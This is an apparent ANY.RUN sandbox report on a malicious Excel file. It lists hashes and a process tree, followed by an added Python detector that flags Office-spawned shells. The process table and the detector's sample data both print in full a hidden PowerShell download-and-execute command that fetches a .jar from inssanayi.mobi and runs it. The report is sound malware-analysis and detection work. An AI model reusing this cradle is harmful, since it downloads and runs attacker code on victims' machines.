Field | Value
---|---
File name | 06.12.2018 Siparis_77.xls
Full analysis | https://app.any.run/tasks/ad91d6d0-9314-4c46-9d50-5ca43e2cf7ee
Verdict | Malicious activity
Analysis date | December 06, 2018, 10:18:46
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | —
MIME | text/plain
File info | Non-ISO extended-ASCII text, with CRLF line terminators
MD5 | 6EB3F3E5281EB2652EC220AA1F927248
SHA1 | 7A0A83CA7B5D9C3F79776AD4ADA0CA18A349BA35
SHA256 | BC46802B3F48100DCF0B313BED7967E6E21138686E0612828EAF6C0C6F0B6973
SSDEEP | 192:y8kNFeqyVk3t91/99zWl+FMbjhLNgvw48cob7GX:y8WvrtV9yl1bjZN74Dob7U
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3484 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe
3940 | CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://inssanayi.mobi\" ,\" %temp%\\RSfqkJ.jar\") }" & %temp%\\RSfqkJ.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE
2412 | powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile(\"http://inssanayi.mobi\" ,\" C:\Users\admin\AppData\Local\Temp\\RSfqkJ.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CMD.EXE
3352 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\RSfqkJ.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | CMD.EXE

PID | User | Company | Integrity level | Description | Version | Exit code
---|---|---|---|---|---|---
3484 | admin | Microsoft Corporation | MEDIUM | Microsoft Excel | 14.0.6024.1000 | —
3940 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 1
2412 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) | 0
3352 | admin | Oracle Corporation | MEDIUM | Java(TM) Platform SE binary | 8.0.920.14 | 1
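The process table above is the detection signal in this report: a file identified as plain text is opened by EXCEL.EXE with the /dde switch, Excel spawns CMD.EXE, which runs a hidden PowerShell download cradle into %temp% and then hands the dropped .jar to javaw.exe (which exits with code 1, consistent with the 92-byte text response recorded in the HTTP table rather than a real archive). The script below is an added example, not part of the ANY.RUN report: it rebuilds the parent/child tree from process-creation records and flags shell or loader processes that descend from an Office application, annotating each with command-line indicators and any URL it carries. The records are constructed from the report's rows; the field layout (pid, ppid, image, cmdline), the placeholder pid 1000 for explorer.exe, and the indicator regexes are assumptions of this example.

```python
"""Rebuild the report's process tree and flag the Office -> shell launch chain.

Added example, not part of the ANY.RUN report. The event records below are
constructed from the report's process table; the field layout (pid, ppid,
image, cmdline) and the placeholder pid 1000 for explorer.exe are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str


# Constructed from the report; explorer.exe gets an assumed pid of 1000.
EVENTS = [
    Proc(1000, None, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(3484, 1000, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde'),
    Proc(3940, 3484, r"C:\Windows\system32\CMD.EXE",
         r'CMD.EXE /c powershell -executionpolicy bypass -W Hidden -command '
         r'"& { (new-object System.Net.WebClient).DownloadFile(\"http://inssanayi.mobi\" ,'
         r'\" %temp%\\RSfqkJ.jar\") }" & %temp%\\RSfqkJ.jar'),
    Proc(2412, 3940, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'powershell -executionpolicy bypass -W Hidden -command '
         r'"& { (new-object System.Net.WebClient).DownloadFile(\"http://inssanayi.mobi\" ,'
         r'\" C:\Users\admin\AppData\Local\Temp\\RSfqkJ.jar\") }"'),
    Proc(3352, 3940, r"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe",
         r'"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar '
         r'"C:\Users\admin\AppData\Local\Temp\RSfqkJ.jar"'),
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Children worth alerting on when an Office app is anywhere in their ancestry.
CHILDREN_OF_INTEREST = {"cmd.exe", "powershell.exe", "javaw.exe", "java.exe",
                        "wscript.exe", "cscript.exe", "mshta.exe", "regsvr32.exe"}

# Command-line indicator names and the (assumed) patterns behind them.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient", re.I),
    "execpolicy_bypass": re.compile(r"-e\w*\s+bypass", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "temp_payload": re.compile(r"%temp%|\\AppData\\Local\\Temp\\", re.I),
    "jar_payload": re.compile(r"\.jar\b", re.I),
}
URL_RE = re.compile(r"https?://[^\s\"'\\)]+")


def basename(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def build_index(procs: List[Proc]) -> Dict[int, Proc]:
    return {p.pid: p for p in procs}


def lineage(pid: int, by_pid: Dict[int, Proc]) -> List[Proc]:
    """Walk ppid links upwards; returns root-first, cycle-safe."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid) if cur.ppid is not None else None
    return list(reversed(chain))


def suspicious_cmdline(cmd: str) -> List[str]:
    """Names of every indicator pattern that matches the command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def find_office_chains(procs: List[Proc]) -> List[dict]:
    """Alert on shells/loaders whose ancestry contains an Office application."""
    by_pid = build_index(procs)
    alerts = []
    for p in procs:
        if basename(p.image) not in CHILDREN_OF_INTEREST:
            continue
        chain = lineage(p.pid, by_pid)
        office = [a for a in chain[:-1] if basename(a.image) in OFFICE_APPS]
        if not office:
            continue
        indicators = suspicious_cmdline(p.cmdline)
        # The Office process itself carrying /dde is the strongest single clue.
        if any("/dde" in a.cmdline.lower() for a in office):
            indicators.insert(0, "dde_launch")
        alerts.append({
            "pid": p.pid,
            "chain": [basename(a.image) for a in chain],
            "indicators": indicators,
            "urls": sorted(set(URL_RE.findall(p.cmdline))),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_office_chains(EVENTS):
        print(f"pid {alert['pid']}: {' -> '.join(alert['chain'])}")
        print(f"  indicators: {', '.join(alert['indicators'])}")
        if alert["urls"]:
            print(f"  urls: {', '.join(alert['urls'])}")
```

Run as-is it reports three alerts (pids 3940, 2412 and 3352), each with the full explorer.exe -> excel.exe -> cmd.exe lineage; only the CMD and PowerShell rows carry the download-cradle and bypass indicators and the inssanayi.mobi URL, while javaw.exe is flagged purely for loading a .jar from the temp directory under an Office ancestor. Matching on ancestry rather than the immediate parent is what keeps the javaw row in scope even though its direct parent is CMD.EXE, not Excel.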
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3484 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA77E.tmp.cvr | — | — | —
2412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VBGFZ7KFDB2YEXXVU1PS.temp | — | — | —
2412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13ceec.TMP | binary | 0C1DAA668BA499584B0AC7476368101E | 326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2412 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 0C1DAA668BA499584B0AC7476368101E | 326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2412 | powershell.exe | C:\Users\admin\AppData\Local\Temp\RSfqkJ.jar | text | 13325E5793A9E1CDFD7374D1B2B6B535 | AF42F553D04333B4ECCA0182DAEB242229668696EA0211F8C4D88F6608A1760F
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2412 | powershell.exe | GET | 200 | 188.165.3.209:80 | http://inssanayi.mobi/ | IE | text | 92 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2412 | powershell.exe | 188.165.3.209:80 | inssanayi.mobi | OVH SAS | IE | unknown |
Domain | IP | Reputation
---|---|---
inssanayi.mobi | | unknown